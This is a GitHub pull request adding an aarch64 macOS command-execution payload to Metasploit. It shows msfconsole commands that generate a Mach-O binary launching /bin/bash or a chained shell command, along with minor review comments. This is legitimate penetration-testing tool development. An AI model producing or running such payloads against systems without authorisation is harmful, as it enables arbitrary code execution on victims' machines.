Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add osx aarch64 exec payload #18646

Merged

Conversation

AlanFoster
Copy link
Contributor

@AlanFoster AlanFoster commented Dec 30, 2023

Adds a new osx/aarch64/exec payload that can execute arbitrary user provided commands via a execve system call on M1/M2/M3 Apple laptops.

Verification

  1. On an M1 machine
  2. Generate a payload:
msf6 payload(osx/aarch64/exec) > generate -f macho cmd=/bin/bash -o shell
[*] Writing 50072 bytes to shell...
  1. chmod and execute:
➜  metasploit-framework git:(add-osx-aarch64-exec-payload) ✗ chmod +x ./shell 
➜  metasploit-framework git:(add-osx-aarch64-exec-payload) ✗ ./shell 

The default interactive shell is now zsh.
To update your account to use zsh, please run `chsh -s /bin/zsh`.
For more details, please visit https://support.apple.com/kb/HT208050.
bash-3.2$

With arguments:

msf6 payload(osx/aarch64/exec) > generate -f macho cmd="/bin/bash -c 'echo 123 && echo abc && whoami && echo 🔥'" -o shell
[*] Writing 50072 bytes to shell...

Executing:

$ ./shell
123
abc
user
🔥

@AlanFoster AlanFoster force-pushed the add-osx-aarch64-exec-payload branch 4 times, most recently from 3bd0c2b to 4a6096a Compare December 30, 2023 17:52
modules/payloads/singles/osx/aarch64/exec.rb Outdated Show resolved Hide resolved
Comment on lines 117 to 118
end.join("\n")
push_string += "\n"
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
end.join("\n")
push_string += "\n"
end
push_string = push_string.join("\n") + "\n"

Invoking a method on the end keyword, even if correct, is a tad confusing when used outside of strings interpolation I think.

modules/payloads/singles/osx/aarch64/exec.rb Outdated Show resolved Hide resolved

describe '#create_aarch64_string_in_stack' do
context 'when the string is calc.exe' do
it 'genearates the required stack' do
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
it 'genearates the required stack' do
it 'generates the required stack' do

end

context 'when the string is /bin/bash -c "echo abcdef1234"' do
it 'genearates the required stack' do
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
it 'genearates the required stack' do
it 'generates the required stack' do

modules/payloads/singles/osx/aarch64/exec.rb Outdated Show resolved Hide resolved
@AlanFoster AlanFoster force-pushed the add-osx-aarch64-exec-payload branch from 4a6096a to 92edf01 Compare January 2, 2024 14:32
@AlanFoster AlanFoster force-pushed the add-osx-aarch64-exec-payload branch from 92edf01 to 0848909 Compare May 23, 2024 10:07
@AlanFoster AlanFoster force-pushed the add-osx-aarch64-exec-payload branch from 0848909 to 16bfa00 Compare May 31, 2024 16:50
@AlanFoster AlanFoster force-pushed the add-osx-aarch64-exec-payload branch from 16bfa00 to dbeeade Compare May 31, 2024 16:51
@adfoster-r7 adfoster-r7 marked this pull request as ready for review May 31, 2024 17:03
@cgranleese-r7 cgranleese-r7 merged commit f2902b3 into rapid7:master May 31, 2024
53 of 54 checks passed
@cgranleese-r7 cgranleese-r7 self-assigned this May 31, 2024
@cgranleese-r7 cgranleese-r7 added the rn-modules release notes for new or majorly enhanced modules label May 31, 2024
@cgranleese-r7
Copy link
Contributor

Release Notes

Add osx aarch64 exec payload.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Development

Successfully merging this pull request may close these issues.

3 participants